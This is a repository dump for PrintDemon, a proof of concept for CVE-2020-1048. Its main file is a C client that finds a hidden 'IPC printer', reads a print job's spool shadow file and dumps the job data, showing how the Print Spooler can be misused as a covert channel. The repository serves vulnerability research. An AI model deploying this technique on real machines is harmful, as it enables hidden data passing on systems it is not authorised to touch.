[
  {
    "path": ".gitignore",
    "content": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Mono auto generated files\nmono_crash.*\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n[Ll]ogs/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUnit\n*.VisualState.xml\nTestResult.xml\nnunit-*.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage 
Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# NuGet Symbol Packages\n*.snupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n*.appxbundle\n*.appxupload\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# 
Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- [Bb]ackup.rdl\n*- [Bb]ackup ([0-9]).rdl\n*- [Bb]ackup ([0-9][0-9]).rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis 
results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb\n\n# Backup folder for Package Reference Convert tool in Visual Studio 2017\nMigrationBackup/\n\n# Ionide (cross platform F# VS Code tools) working folder\n.ionide/\n"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2020 Alex Ionescu\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# PrintDemon (CVE-2020-1048)\n\nPrintDemon is a PoC for a series of issues in the Windows Print Spooler service, as well as potential misuses of its functionality. Please read https://windows-internals.com/printdemon-cve-2020-1048/ for all of the information.\n"
  },
  {
    "path": "printclient/pclient.c",
    "content": "#include <windows.h>\n#include <stdio.h>\n#include \"..\\shdfile4.h\"\n\nINT\nmain(\n    _In_ INT ArgumentCount,\n    _In_ PCHAR Arguments[]\n    )\n{\n    PRINTER_DEFAULTS printerDefaults;\n    BOOL bRes;\n    HANDLE hPrinter;\n    PJOB_INFO_4 jobInfo;\n    DWORD dwNeeded, dwReturned;\n    PPRINTER_INFO_4 printerInfo, currentInfo;\n    PPRINTER_INFO_2 printerFullInfo;\n    LPWSTR printerName;\n    WCHAR jobName[64];\n    HANDLE hJob;\n    DWORD dwError;\n    PCHAR printerData;\n    WCHAR spoolDir[MAX_PATH];\n    SHADOWFILE_4 shadowFileData;\n    PSHADOWFILE_4 pShadowFileData;\n\n    //\n    // First see how much space we need\n    //\n    dwNeeded = 0;\n    dwReturned = 0;\n    bRes = EnumPrinters(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &dwNeeded, &dwReturned);\n    if ((bRes != FALSE) || (dwNeeded == 0))\n    {\n        printf(\"Error: %lx\\n\", GetLastError());\n        return -1;\n    }\n\n    //\n    // Allocate it\n    //\n    printerInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n    if (printerInfo == NULL)\n    {\n        printf(\"Error: %lx\\n\", GetLastError());\n        return NULL;\n    }\n\n    //\n    // Now enumerate the printer\n    //\n    bRes = EnumPrinters(PRINTER_ENUM_LOCAL,\n                        NULL,\n                        4,\n                        (LPBYTE)printerInfo,\n                        dwNeeded,\n                        &dwNeeded,\n                        &dwReturned);\n    if (bRes == FALSE)\n    {\n        printf(\"Error: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, printerInfo);\n        return -1;\n    }\n    \n    //\n    // Enumerate all the printers\n    //\n    printerName = NULL;\n    currentInfo = printerInfo;\n    while (dwReturned--)\n    {\n        //\n        // Check for attributes that indicate ours\n        //\n        if ((currentInfo->Attributes & (PRINTER_ATTRIBUTE_HIDDEN |\n                                        PRINTER_ATTRIBUTE_RAW_ONLY |\n             
                           PRINTER_ATTRIBUTE_LOCAL)) ==\n                                       (PRINTER_ATTRIBUTE_HIDDEN |\n                                        PRINTER_ATTRIBUTE_RAW_ONLY |\n                                        PRINTER_ATTRIBUTE_LOCAL))\n        {\n            //\n            // We found it!\n            //\n            printf(\"[+] Found IPC Printer: %S (status = %lx)\\n\",\n                    currentInfo->pPrinterName, currentInfo->Attributes);\n            printerName = currentInfo->pPrinterName;\n            break;\n        }\n        currentInfo++;\n    }\n\n    //\n    // Check if we found our printer\n    //\n    if (printerName == NULL)\n    {\n        printf(\"[-] Couldn't find IPC printer!\\n\");\n        return -1;\n    }\n\n    //\n    // We did, go open it, and then free the name/info structure\n    //\n    printerDefaults.pDatatype = NULL;\n    printerDefaults.pDevMode = NULL;\n    printerDefaults.DesiredAccess = PRINTER_ALL_ACCESS;\n    bRes = OpenPrinter(printerName, &hPrinter, &printerDefaults);\n    HeapFree(GetProcessHeap(), 0, printerInfo);\n    if (bRes == FALSE)\n    {\n        printf(\"Failed to open printer: %lx\\n\", GetLastError());\n        return -1;\n    }\n\n    //\n    // Check how much space we needed for the printer information\n    //\n    bRes = GetPrinter(hPrinter, 2, NULL, 0, &dwNeeded);\n    if (bRes != FALSE)\n    {\n        printf(\"Unexpected success querying printer\\n\");\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Allocate it\n    //\n    printerFullInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n    if (printerFullInfo == NULL)\n    {\n        printf(\"Out of memory\\n\");\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Now query it\n    //\n    bRes = GetPrinter(hPrinter,\n                      2,\n                      (LPBYTE)printerFullInfo,\n                      dwNeeded,\n                      &dwNeeded);\n    
if (bRes == FALSE)\n    {\n        printf(\"Failed to query printer: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, printerFullInfo);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Make sure someone published some data to it\n    //\n    if (printerFullInfo->cJobs != 1)\n    {\n        printf(\"Printer doesn't have an active job: %lx\\n\", printerFullInfo->cJobs);\n        HeapFree(GetProcessHeap(), 0, printerFullInfo);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Enumerate the first (and only) job -- see how much space is needed for it\n    //\n    HeapFree(GetProcessHeap(), 0, printerFullInfo);\n    bRes = EnumJobs(hPrinter, 0, 1, 4, NULL, 0, &dwNeeded, &dwReturned);\n    if ((bRes != FALSE) && (dwReturned != 0))\n    {\n        printf(\"Failed to enumerate jobs: %lx\\n\", GetLastError());\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n    else if (dwNeeded == 0)\n    {\n        printf(\"[-] No printer job active!\\n\");\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Allocate space for it\n    //\n    jobInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n    if (jobInfo == NULL)\n    {\n        printf(\"Out of memory\\n\");\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Now enumerate information on this job\n    //\n    bRes = EnumJobs(hPrinter,\n                    0,\n                    1,\n                    4,\n                    (LPBYTE)jobInfo,\n                    dwNeeded,\n                    &dwNeeded,\n                    &dwReturned);\n    if (bRes == FALSE)\n    {\n        printf(\"Error enumerating job: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Print some information on the job based on the API\n    //\n    printf(\"[+] Found IPC Job\\n\");\n    printf(\"[.]\\tJob 
ID: %d\\n\", jobInfo->JobId);\n    printf(\"[.]\\tQueued by: %S on %S\\n\",\n           jobInfo->pUserName, jobInfo->pMachineName);\n    printf(\"[.]\\tSD: %p\\n\", jobInfo->pSecurityDescriptor);\n    printf(\"[.]\\tDocument Name: %S and type: %S\\n\",\n           jobInfo->pDocument, jobInfo->pDatatype);\n    printf(\"[.]\\tJob Status: %lx (%S)\\n\",\n           jobInfo->Status, jobInfo->pStatus);\n    printf(\"[.]\\tPriority: %d Position: %d\\n\",\n           jobInfo->Priority, jobInfo->Position);\n    printf(\"[.]\\tData Size: %lld bytes (%d pages total, %d printed so far)\\n\",\n           (DWORD64)jobInfo->SizeHigh << 32ULL | jobInfo->Size,\n           jobInfo->TotalPages, jobInfo->PagesPrinted);\n    printf(\"[.]\\tTime: %d Start Time: %d End Time: %d\\n\",\n           jobInfo->Time, jobInfo->StartTime, jobInfo->UntilTime);\n    printf(\"[.]\\tSubmitted on %d/%d/%d at %d:%d:%d.%d\\n\",\n           jobInfo->Submitted.wMonth, jobInfo->Submitted.wDay, jobInfo->Submitted.wYear,\n           jobInfo->Submitted.wHour, jobInfo->Submitted.wMinute, jobInfo->Submitted.wSecond,\n           jobInfo->Submitted.wMilliseconds);\n\n    //\n    // Get the spooler directory\n    //\n    dwError = GetPrinterData(hPrinter,\n                             SPLREG_DEFAULT_SPOOL_DIRECTORY,\n                             NULL,\n                             (LPBYTE)spoolDir,\n                             sizeof(spoolDir),\n                             &dwNeeded);\n    if (dwError != ERROR_SUCCESS)\n    {\n        printf(\"Failed getting spooler directory: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Done with the printer\n    //\n    ClosePrinter(hPrinter);\n\n    //\n    // Open the shadow file based on the expected name\n    //\n    HANDLE hShadowFile;\n    WCHAR shadowFileName[MAX_PATH];\n    wsprintf(shadowFileName, L\"%s\\\\%05d.SHD\", spoolDir, jobInfo->JobId);\n    
printf(\"[.] Opening %S\\n\", shadowFileName);\n    hShadowFile = CreateFile(shadowFileName,\n                             GENERIC_READ,\n                             0,\n                             NULL,\n                             OPEN_EXISTING,\n                             FILE_ATTRIBUTE_NORMAL,\n                             NULL);\n    if (hShadowFile == INVALID_HANDLE_VALUE)\n    {\n        printf(\"[-] Couldn't find shadow file (it can have any name it wants): %lx\\n\",\n                GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // Read the shadow file\n    //\n    bRes = ReadFile(hShadowFile,\n                    &shadowFileData,\n                    sizeof(shadowFileData),\n                    &dwReturned,\n                    NULL);\n    if ((bRes == FALSE) || (dwReturned != sizeof(shadowFileData)))\n    {\n        printf(\"[-] Error reading shadow file: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        ClosePrinter(hPrinter);\n        return -1;\n    }\n\n    //\n    // We only support Version 4\n    //\n    if ((shadowFileData.Version != SF_VERSION_4) ||\n        (shadowFileData.HeaderSize != sizeof(shadowFileData)) ||\n        (shadowFileData.signature != SF_SIGNATURE_4))\n    {\n        printf(\"[-] Unrecognized shadow file format\\n\");\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        return -1;\n    }\n\n    //\n    // Make sure it's for this job\n    //\n    if (shadowFileData.JobId != jobInfo->JobId)\n    {\n        printf(\"[-] Job ID mismatch: %d\\n\", shadowFileData.JobId);\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        return -1;\n    }\n \n    //\n    // Get the size of the shadow spool file\n    //\n    dwNeeded = GetFileSize(hShadowFile, NULL);\n    if (dwNeeded == 0)\n    {\n        
printf(\"Error getting file size: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        return -1;\n    }\n\n    //\n    // Allocate data for it\n    //\n    pShadowFileData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n    if (pShadowFileData == NULL)\n    {\n        printf(\"Out of memory\\n\");\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        return -1;\n    }\n\n    //\n    // Go back to the start\n    //\n    SetFilePointer(hShadowFile, 0, NULL, SEEK_SET);\n\n    //\n    // Read the full file this time around\n    //\n    bRes = ReadFile(hShadowFile,\n                    pShadowFileData,\n                    dwNeeded,\n                    &dwReturned,\n                    NULL);\n    if ((bRes == FALSE) || (dwReturned != dwNeeded))\n    {\n        printf(\"[-] Error reading shadow file: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        CloseHandle(hShadowFile);\n        return -1;\n    }\n\n    //\n    // We no longer need the shadow file\n    //\n    CloseHandle(hShadowFile);\n\n    //\n    // Print the data from the shadow file\n    //\n    printf(\"[+] Found Shadow File Job\\n\");\n    printf(\"[.]\\tJob ID: %d\\n\", pShadowFileData->JobId);\n    printf(\"[.]\\tQueued by: %S on %S\\n\",\n           (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pUser),\n           (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pMachineName));\n    printf(\"[.]\\tSD: %p\\n\", (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pSecurityDescriptor));\n    printf(\"[.]\\tDocument Name: %S and type: %S\\n\",\n           (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pDocument),\n           (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pDatatype));\n    printf(\"[.]\\tJob Status: %lx\\n\",\n           pShadowFileData->Status);\n    
printf(\"[.]\\tPriority: %d\\n\",\n           pShadowFileData->Priority);\n    printf(\"[.]\\tData Size: %lld bytes (%d pages total)\\n\",\n           (DWORD64)pShadowFileData->SizeHigh << 32ULL | pShadowFileData->Size,\n           pShadowFileData->cPages);\n    printf(\"[.]\\tStart Time: %d End Time: %d\\n\",\n            pShadowFileData->StartTime, pShadowFileData->UntilTime);\n    printf(\"[.]\\tSubmitted on %d/%d/%d at %d:%d:%d.%d\\n\",\n           pShadowFileData->Submitted.wMonth, pShadowFileData->Submitted.wDay, pShadowFileData->Submitted.wYear,\n           pShadowFileData->Submitted.wHour, pShadowFileData->Submitted.wMinute, pShadowFileData->Submitted.wSecond,\n           pShadowFileData->Submitted.wMilliseconds);\n\n    //\n    // Open the print job\n    //\n    wsprintf(jobName, L\"%s,Job %d\", jobInfo->pPrinterName, jobInfo->JobId);\n    bRes = OpenPrinter(jobName, &hJob, NULL);\n    if (bRes == FALSE)\n    {\n        printf(\"Failed to open printer job: %lx\\n\", GetLastError());\n        return -1;\n    }\n\n    //\n    // Allocate space for the printer data\n    //\n    printerData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, jobInfo->Size);\n    if (printerData == NULL)\n    {\n        printf(\"Out of memory\\n\");\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        ClosePrinter(hJob);\n        return -1;\n    }\n\n    //\n    // Read printer data\n    //\n    printf(\"[.] 
Reading %d bytes of data from printer\\n\", jobInfo->Size);\n    bRes = ReadPrinter(hJob, printerData, jobInfo->Size, &dwNeeded);\n    if (bRes == FALSE)\n    {\n        printf(\"Failed to read printer data: %lx\\n\", GetLastError());\n        HeapFree(GetProcessHeap(), 0, printerData);\n        HeapFree(GetProcessHeap(), 0, jobInfo);\n        ClosePrinter(hJob);\n        return -1;\n    }\n\n    //\n    // Print it out (assume it's a string)\n    //\n    printf(\"[+] Printer Data: %s\\n\", printerData);\n\n    //\n    // All done here\n    //\n    HeapFree(GetProcessHeap(), 0, printerData);\n    HeapFree(GetProcessHeap(), 0, jobInfo);\n    ClosePrinter(hJob);\n    return 0;\n}\n\n"
  },
  {
    "path": "printclient/printclient.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{26e2f7f8-6626-4f1c-8f23-26baa7253cb2}</ProjectGuid>\n    <RootNamespace>printclient</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    
<ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      
<ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"pclient.c\" />\n  </ItemGroup>\n  <Import 